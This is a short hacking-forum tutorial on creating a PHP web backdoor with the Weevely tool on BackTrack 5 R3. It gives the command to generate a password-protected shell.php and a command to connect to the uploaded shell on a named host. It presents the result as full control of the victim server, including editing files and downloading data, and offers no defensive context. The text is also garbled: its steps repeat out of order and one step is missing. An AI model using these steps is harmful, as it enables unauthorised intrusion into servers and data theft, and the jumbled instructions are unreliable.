[TuT] Creating a simple web backdoor [BT5 R3]
Hey guys, i will show you how to create a simple web backdoor using backtrack 5 r3.
First step:
Enter Backtrack~>Maintaining access~>Web backdoors~>Weevely
Step three:
Press enter and wait for the web backdoor to be created. After it finish the web backdoor creation it should look like this.
Step four:
You created the backdoor. Lets say that you already uploaded the shell. Now to connect to the backdoor you need to type the following command: ./weevely.py password. In our case will be: http://livehits.zz.mu/shell.php teamcrackers. After you write this hit enter and a telnet session should start. To connect to the backdoor may take a while so you must be patient.
Let's say that the session started. Now you have control over the server. You can make/delete/edit derectories, download what you want etc.
First step:
Enter Backtrack~>Maintaining access~>Web backdoors~>Weevely
Second step:
Now, we will create our web backdoor. the command is: ./weevely.py generate teamcrackers /root/Desktop/shell.php
teamcrackers will be the password
/desktop/shell.php will be the destination path
Step three:
Press enter and wait for the web backdoor to be created. After it finish the web backdoor creation it should look like this.
Step four:
You created the backdoor. Lets say that you already uploaded the shell. Now to connect to the backdoor you need to type the following command: ./weevely.py
Let's say that the session started. Now you have control over the server. You can make/delete/edit derectories, download what you want etc.